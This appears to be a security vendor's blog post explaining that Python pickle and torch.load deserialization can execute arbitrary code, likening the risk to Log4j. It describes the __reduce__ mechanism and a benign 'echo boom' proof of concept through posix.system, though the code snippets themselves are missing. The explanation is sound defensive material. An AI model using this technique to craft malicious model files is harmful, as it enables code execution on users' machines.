During the last moments of 2021, we learned of a new vulnerability in a previously-inconspicuous library called “Log4j”. What started out as a bug report, soon escalated into a worldwide national-security event. Disruptions were felt throughout myriad popular services. Google reportedly had 500 engineers going through their codebases for impact analysis. The U.S. federal government issued an emergency directive requiring its agencies to mitigate these vulnerabilities immediately. Attacks by nation/state actors in China, Iran, and North Korea were detected in real time. CVE-2021-44228 received a CVSS score of 10.0 — indicating the highest possible severity. Memes were made.
We won’t go into too much technical detail here. However, the spine-chilling crux of the log4j exploit is that it allowed attackers to execute arbitrary code in privileged processes in many, many servers throughout the world. Crucially, “arbitrary” here means, well, anything.
Should you care?
You’re a data scientist or an ML engineer. You don’t use Log4j (or don’t know that you do...). You don’t even use Java. You wouldn’t be caught dead using any JVM-based language. You just use python. You’re all set. Well… do you use pickle files? Or any other Python serializers? Does the snippet “model = torch.load(path)” ring any bells?
If you do, or your team does, you might want to bear with us here, as your organization’s internal machines might be at a similar risk as the one Log4j-using ones used to be.
You probably serialize
Modern data science is not done in a vacuum. Practitioners rely heavily on open-source and third-party shared models and benchmark data. This can be a good thing: globally-available and shared artifacts can help companies quickly adopt new and state-of-the-art algorithmic approaches and datasets, which is crucial in today's reality of unprecedentedly speedy progress. Without adopting third-party models, a production system can quickly become obsolete. However, are the sources of these artifacts, and their distribution chain, always trustworthy? Are they safe to use?
To answer that, let’s examine serialization. Serialization is the mechanism by which third-party models and data are typically imported into your process memory. Serialization solves a problem that almost every ****programmer, especially dealing with data, encounters daily: writing in-memory objects into files, so they can be stored persistently and shared, to then be “deserialized” back into process memory.
Pickle serialization is amazing
To most programmers, using Pickle — or serializers built on top of it like the one PyTorch uses — seems like a form of typical Python magic. It’s so simple! Consider the following piece of code
and voila, your object of type A **is stored under myfile.pkl. Then,
if you run this once the object is serialized (by the first script), you will notice that a neatly contains your serialized object, and the script successfully prints “3”.
This seems so natural, but let’s stop for a second and appreciate a few things that Pickle is doing for us here. First, those of us who ever wrote a custom class whose objects are serializable into a non-pickle format (e.g. JSON, or using a programming language other than Python) might greatly appreciate the fact that, with Pickle, you usually don’t have to write any custom serialization code. Pickle takes care of deciding the order of field serialization, the storage memory layout, recursive calls to serialize non-primitive object fields, and most everything else. Second, notice that the second script does not need to call import json, but somehow the call to a.print() “magically” manages to use json functionality — how convenient!
No free lunch
Unfortunately, pickle’s incredibly simple interface comes at a cost. Pickle’s deserializer, which is called into whenever we invoke “pickle.load” (or “torch.load”!), is a full-fledged virtual machine, able to run arbitrary code within the process that loads the object. It is expressly built to allow serialized objects to come with arbitrary instructions on how to deserialize them. In other words, Pickle deserialization readily supports running arbitrary code specified by the serializer (the original author of the file). It is, in fact, as simple as a few lines of code, by employing the designated “reduce” function. For example, try the following (you can replace “torch” with “pickle” and “save” with “load”). Feel free to also jump to the Appendix below, for a slightly more in-depth view of the Pickle virtual machine’s opcodes.
Python’s documentation cautions against loose usage of pickle deserialization. It was meant for efficiency and ease of use — not security, the manual warns us with this scary bright orange box.
Not use Pickle? That train left.
Unfortunately, despite the (in)security issue of using Pickle to deserialize files of untrusted origin being known for years, and despite explicit recommendations against this in the documentation, it has become a standard practice to do just that. Extremely popular libraries like Hugging Face Transformers use pickle (or Torch serialization) freely to share and import models, as well as many (most?) implementations you would find in artifact-sharing sites like Model Zoo. Deserializing Pickle files of questionable provenance, thus exposing oneself to arbitrary code execution, has become a second nature to data scientists.
Can Pickle be fixed?
Unfortunately, Pickle will not be “fixed” (=be made secure) in a future version, nor is there a straightforward way to detect or prevent exploits. Pickle’s vulnerability is tightly tied to its impressive usefulness. In technical terms, Pickle’s virtual machine is not a sandbox, and neither is Python’s interpreter — which means that getting a guarantee of safe deserialization for arbitrary files is going to be a formidable challenge.
What can we do?
At Robust Intelligence, we run a series of stress tests that also include Pickle file security. Contact us to learn more!
Appendix: Disassembling Pickles
Below, we see the “disassembled” (=made human-readable) pickle VM opcodes for our “payload” class. Even without knowing opcode semantics, which we will not get into here, we can imagine that this code loads the “posix.system()” (equivalent to “os.system”) function, and calls it, passing the string ‘echo “boom”’ as its argument.